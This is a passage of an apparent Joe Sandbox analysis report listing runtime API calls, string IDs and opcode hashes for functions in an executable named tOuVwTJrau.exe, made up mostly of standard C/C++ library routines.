                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 36c338d63652baa7a2d069411ca7b007afd12920a66e6239884579c070888dfc
                                                                • Instruction ID: 463ec186f360a8b454ab3c56a0de0011578805dc2f382c186e8fbb57fe29df1f
                                                                • Opcode Fuzzy Hash: 36c338d63652baa7a2d069411ca7b007afd12920a66e6239884579c070888dfc
                                                                • Instruction Fuzzy Hash: F501D43622A3125FE6272BB5ACA66572A88EB03777B31033AF5118D0F2EF515C11A241
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID: `&0
                                                                • API String ID: 1740715915-1385275834
                                                                • Opcode ID: a18aa5a49987928832f71080fe4b41253f35d29b6f85cd0c06da12a004d8269f
                                                                • Instruction ID: 7bfc491aa93ef25b7ef4f8bc3a18f3caafc18486e2ad493eae4ed24632414a40
                                                                • Opcode Fuzzy Hash: a18aa5a49987928832f71080fe4b41253f35d29b6f85cd0c06da12a004d8269f
                                                                • Instruction Fuzzy Hash: 8751E176613203AFDB2B9F54D8A1BBAB3A5FF04700F254229E8059B6E1D731ED41C751
                                                                Strings
                                                                • C:\Users\user\Desktop\tOuVwTJrau.exe, xrefs: 0031FA3C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\Desktop\tOuVwTJrau.exe
                                                                • API String ID: 0-2256859958
                                                                • Opcode ID: 5304f0414d0f182a3b7d88306db4ee6e6a3b00616b587c9c2cfbe96b26c633e2
                                                                • Instruction ID: ab241924edf5013baad03959121870c2217799f2818d06a60d3c8cbb356c714b
                                                                • Opcode Fuzzy Hash: 5304f0414d0f182a3b7d88306db4ee6e6a3b00616b587c9c2cfbe96b26c633e2
                                                                • Instruction Fuzzy Hash: 0A21D471204206AF9B2AAF648C909EB77ADEF0C3647254634F96DCB150DB75DCC08BA0
                                                                APIs
                                                                  • Part of subcall function 003083B9: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,0030840B,00000014,?,0030844C,00000014,?,002E2D32,00000000,00000014), ref: 003083C5
                                                                • __Mtx_unlock.LIBCPMT ref: 0030849E
                                                                • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,AA6E0749,?,?,?,00328C80,000000FF), ref: 003084C6
                                                                • __Mtx_unlock.LIBCPMT ref: 00308501
                                                                • __Cnd_broadcast.LIBCPMT ref: 00308512
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                                • String ID: `&0
                                                                • API String ID: 420990631-1385275834
                                                                • Opcode ID: 7f34b8c791b2ced4cf63b74496cf613e358bd111f5c1d931bae379714a9accb6
                                                                • Instruction ID: c6c082caa5836d492cbaede422a41fca88d99f14fb2ce60670194b2aca99558a
                                                                • Opcode Fuzzy Hash: 7f34b8c791b2ced4cf63b74496cf613e358bd111f5c1d931bae379714a9accb6
                                                                • Instruction Fuzzy Hash: D7110F7E541610ABCA137B65EC62B5FB76CEF41B20F01481AF9459B2D3DF35E400C690
                                                                APIs
                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 002E499F
                                                                  • Part of subcall function 0030B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,00343A84,?,?,?,00343A84), ref: 0030B4A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise___std_exception_copy
                                                                • String ID: HE4$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 3109751735-3105575111
                                                                • Opcode ID: 2e28953757b96a329e51543f23409250f43294a889eb6304a83cd681be7fb098
                                                                • Instruction ID: 27d79f106a9a88bae6d9fdc2bee9881ba2952278a34c35bdf7666e9d8a59bd20
                                                                • Opcode Fuzzy Hash: 2e28953757b96a329e51543f23409250f43294a889eb6304a83cd681be7fb098
                                                                • Instruction Fuzzy Hash: CA1138B1520745ABC701EF5AC882B96F3E8EF51310F54852AF855AB682E770E924CB51
                                                                APIs
                                                                • FreeLibrary.KERNEL32(00000000,?,?,0030DEB8,?,?,00000000,?,?,0030DF6A,00000002,FlsGetValue,003333D8,003333E0,?), ref: 0030DE87
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID: api-ms-
                                                                • API String ID: 3664257935-2084034818
                                                                • Opcode ID: 38f1ee2a677c6d4d072cb3165082474ecb85eedac67f5158db3cd45c2ef34892
                                                                • Instruction ID: 3ca9bcc6184655f1eb569fb00ffc7acc026639f3a270c123914676ff5a34d054
                                                                • Opcode Fuzzy Hash: 38f1ee2a677c6d4d072cb3165082474ecb85eedac67f5158db3cd45c2ef34892
                                                                • Instruction Fuzzy Hash: B3119136A42221ABDF234BA8DC55B5B73E89F21B70F160620F911EF2C0D670ED00C6D0
                                                                APIs
                                                                • SleepConditionVariableCS.KERNEL32(?,00309EF7,00000064,?,?,?,002E2E1C,0034CDC4), ref: 00309F7D
                                                                • LeaveCriticalSection.KERNEL32(00348FA8,002E2E1C,?,00309EF7,00000064,?,?,?,002E2E1C,0034CDC4), ref: 00309F87
                                                                • WaitForSingleObjectEx.KERNEL32(002E2E1C,00000000,?,00309EF7,00000064,?,?,?,002E2E1C,0034CDC4), ref: 00309F98
                                                                • EnterCriticalSection.KERNEL32(00348FA8,?,00309EF7,00000064,?,?,?,002E2E1C,0034CDC4), ref: 00309F9F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                • String ID: `&0
                                                                • API String ID: 3269011525-1385275834
                                                                • Opcode ID: 3f863fa5add857b6604fb18c18d998c62051b4a860a596459916fda60e9ade66
                                                                • Instruction ID: d0561b2afadce4748f2a26b663d4eb7453eaa97b2798c651608da60a5b7560ee
                                                                • Opcode Fuzzy Hash: 3f863fa5add857b6604fb18c18d998c62051b4a860a596459916fda60e9ade66
                                                                • Instruction Fuzzy Hash: 8EE01239A45125ABCB032B50FC49ACD3F5EEF49F62F044111F9059A5A1CE6129159BD4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: __alloca_probe_16__freea$Info
                                                                • String ID:
                                                                • API String ID: 2330168043-0
                                                                • Opcode ID: 902e1902e6072b04524fb1e9ff51c522272cd3b2566273c6af80b01782660075
                                                                • Instruction ID: fad042cd88f178a193d728a910a376338e1563eacdee970bc3dfbe6c1eb44bc1
                                                                • Opcode Fuzzy Hash: 902e1902e6072b04524fb1e9ff51c522272cd3b2566273c6af80b01782660075
                                                                • Instruction Fuzzy Hash: 3E81937290C229ABDF239F64E951AEE7BB9BF49710F1A0195E904AB241D7319C40C7B1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 323adf0bef1df299c7639a6e0a1ca75dd5dd63918e65cd2cf3daf3c517362075
                                                                • Instruction ID: f8d307f0618d1566b5fc14a755ec24a6628832ce2fb2eace8e12221129cd2251
                                                                • Opcode Fuzzy Hash: 323adf0bef1df299c7639a6e0a1ca75dd5dd63918e65cd2cf3daf3c517362075
                                                                • Instruction Fuzzy Hash: C681F4B091024CEFEF15EFA8C959BEEBBB9EF04344F604159E9016B2C2C7755A44CB92
                                                                APIs
                                                                • __alloca_probe_16.LIBCMT ref: 0031C8AA
                                                                • __alloca_probe_16.LIBCMT ref: 0031C970
                                                                • __freea.LIBCMT ref: 0031C9DC
                                                                  • Part of subcall function 003187D5: HeapAlloc.KERNEL32(00000000,?,?,?,0031FF40,00000220,?,?,?,?,?,?,0030F4C2,?), ref: 00318807
                                                                • __freea.LIBCMT ref: 0031C9E5
                                                                • __freea.LIBCMT ref: 0031CA08
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                • String ID:
                                                                • API String ID: 1096550386-0
                                                                • Opcode ID: 86a9c6a86aed16df40c2ed1f9645451f03c669f8c1a1e9560db047071d9c8317
                                                                • Instruction ID: 0a8ddcc868895de373d8865cd3a6dbb68aad0220072c76fbccd4f7066590957e
                                                                • Opcode Fuzzy Hash: 86a9c6a86aed16df40c2ed1f9645451f03c669f8c1a1e9560db047071d9c8317
                                                                • Instruction Fuzzy Hash: 6751A47259021AAFDB2A9F54CC82FFB37A9EF48750F265119F904EB141EB30DC9187A0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                                • String ID:
                                                                • API String ID: 3354401312-0
                                                                • Opcode ID: 878bf5474324c936245be4281577e5e93de648ef786412f60ed280739c7cca7b
                                                                • Instruction ID: cb115d0b28dbc056ca03bde714d018d93843aa5210634c0807cc6b5e6d7b5f85
                                                                • Opcode Fuzzy Hash: 878bf5474324c936245be4281577e5e93de648ef786412f60ed280739c7cca7b
                                                                • Instruction Fuzzy Hash: 26618E74D02209DFDF15DFA4C964BAEBBB8BF05304F144169E805AB382DB35AA05CFA1
                                                                APIs
                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00310B2E), ref: 00310C1E
                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 00310C78
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00310B2E,?,000000FF,00000000,00000000), ref: 00310D06
                                                                • __dosmaperr.LIBCMT ref: 00310D0D
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00310D4A
                                                                  • Part of subcall function 00310F72: __dosmaperr.LIBCMT ref: 00310FA7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                • String ID:
                                                                • API String ID: 1206951868-0
                                                                • Opcode ID: a41c218c166030c7661966ff5409b4ccba9cf53350bc67e17269209c1a4dfa11
                                                                • Instruction ID: 6e61c2afb634104f431cca2a50a71c6454f4f8cc08c5de19752ec1eedc8cf0d1
                                                                • Opcode Fuzzy Hash: a41c218c166030c7661966ff5409b4ccba9cf53350bc67e17269209c1a4dfa11
                                                                • Instruction Fuzzy Hash: D1413D75900208ABCB2DDFA5E8459EFBBF9EF8D300B144529F956D7611EA70A880CB21
                                                                APIs
                                                                • _free.LIBCMT ref: 003212C3
                                                                  • Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
                                                                  • Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE
                                                                • _free.LIBCMT ref: 003212D5
                                                                • _free.LIBCMT ref: 003212E7
                                                                • _free.LIBCMT ref: 003212F9
                                                                • _free.LIBCMT ref: 0032130B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 524cd053278f94c7c782215edb2b4f9e0c1a2416687927fb92a4a1cf18092529
                                                                • Instruction ID: 73fa4288acec67ee93a3748c4b79f5c520d6cd659cc0e2cb0a7e5bafafb23e07
                                                                • Opcode Fuzzy Hash: 524cd053278f94c7c782215edb2b4f9e0c1a2416687927fb92a4a1cf18092529
                                                                • Instruction Fuzzy Hash: 06F0FF36504610A7C63ADF65F9C2C9A73EEEB96710B651C05F008EB611CF60FC804664
                                                                APIs
                                                                  • Part of subcall function 00304A20: std::locale::_Init.LIBCPMT ref: 00304AB2
                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 002EDD18
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: InitIos_base_dtorstd::ios_base::_std::locale::_
                                                                • String ID: `$3$3
                                                                • API String ID: 3469404174-4666591
                                                                • Opcode ID: 25c64388a9f98664a58c93f06bc209a08c72c5a9875fd14d366d5b9bc2cd71ae
                                                                • Instruction ID: ebdf22fac0e276230673752c3eb8728efea7cf90062463a4ceb26fa7ffd501e1
                                                                • Opcode Fuzzy Hash: 25c64388a9f98664a58c93f06bc209a08c72c5a9875fd14d366d5b9bc2cd71ae
                                                                • Instruction Fuzzy Hash: 0C716C71A01248DFEB15DF68DD94F9DBBB4FF04304F5486A9E409AB281D775AA84CF40
                                                                APIs
                                                                  • Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                  • Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                • _free.LIBCMT ref: 00312C60
                                                                • _free.LIBCMT ref: 00312C8E
                                                                • _free.LIBCMT ref: 00312CD1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorLast
                                                                • String ID: -1
                                                                • API String ID: 3291180501-2512768585
                                                                • Opcode ID: 0491f1a87dec2b9449a948f4716721543ec688b7a6609f4665973fc18a61785a
                                                                • Instruction ID: 120083db3f4ec466c34465300cde9979fc4eaf7d9317a04367fa5f38ce9247f1
                                                                • Opcode Fuzzy Hash: 0491f1a87dec2b9449a948f4716721543ec688b7a6609f4665973fc18a61785a
                                                                • Instruction Fuzzy Hash: 8C414C316001059FD72ADFACCC81AAAB3E9FF4D314B25066DE555CB291EB31ECA09B90
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _strrchr
                                                                • String ID:
                                                                • API String ID: 3213747228-0
                                                                • Opcode ID: c17452bd9d257a50ccdb3366d6f14b865b7cd1596f197bae603c132cad26c692
                                                                • Instruction ID: 2ba306fb7a93fafa94e9d584a47756e0034253f43314c9e05d83fb6325cb2da2
                                                                • Opcode Fuzzy Hash: c17452bd9d257a50ccdb3366d6f14b865b7cd1596f197bae603c132cad26c692
                                                                • Instruction Fuzzy Hash: 89B148319012559FDB1BCF28C8A1BEEBBE5EF5E350F25406BE845DB281D6358D81C760
                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,?,AA6E0749), ref: 002E9A99
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002E9B00
                                                                • GetProcAddress.KERNEL32(00000000), ref: 002E9B07
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcVersion
                                                                • String ID:
                                                                • API String ID: 3310240892-0
                                                                • Opcode ID: 501cde6347de95b0549c62ba3c97988ad0c83fc423bd01271b92d956a0bbfdf3
                                                                • Instruction ID: 324aff219af54f2394c2e1ab82f67a64379cb3f14bc524d7d78ff50fa0ce47d1
                                                                • Opcode Fuzzy Hash: 501cde6347de95b0549c62ba3c97988ad0c83fc423bd01271b92d956a0bbfdf3
                                                                • Instruction Fuzzy Hash: 145157709602889BDB25EF29DD497DDBB78EF45304F9042AAE405AB3C1EB705AD0CB91
                                                                APIs
                                                                • __Mtx_unlock.LIBCPMT ref: 003062E7
                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00306339
                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00306349
                                                                  • Part of subcall function 002E3A60: __Mtx_unlock.LIBCPMT ref: 002E3B54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                                • String ID:
                                                                • API String ID: 3298230783-0
                                                                • Opcode ID: c78eaef06a6f52717e4c39e64b970f63767ed0495abf0e0efd40872f02cb111a
                                                                • Instruction ID: 20bd09d07ff80a835afd3aa848332d1dbf01e36d11d5809a396e49197f580481
                                                                • Opcode Fuzzy Hash: c78eaef06a6f52717e4c39e64b970f63767ed0495abf0e0efd40872f02cb111a
                                                                • Instruction Fuzzy Hash: 2C412C71D013489BCB16EBA4D852BAFBBB89F05300F40496DF54657682EB31A954C7A2
                                                                APIs
                                                                • _free.LIBCMT ref: 0032764E
                                                                • _free.LIBCMT ref: 00327677
                                                                • SetEndOfFile.KERNEL32(00000000,00323DDD,00000000,00324074,?,?,?,?,?,?,?,00323DDD,00324074,00000000), ref: 003276A9
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00323DDD,00324074,00000000,?,?,?,?,00000000), ref: 003276C5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1547350101-0
                                                                • Opcode ID: e4fe9f116b2b58d139c664a147ab03483ac388b46272a10db1f087500203f1bb
                                                                • Instruction ID: 282e2b52bd0a570098d2be12e56ee5308513504ae2e3ae094e268c46f26bf587
                                                                • Opcode Fuzzy Hash: e4fe9f116b2b58d139c664a147ab03483ac388b46272a10db1f087500203f1bb
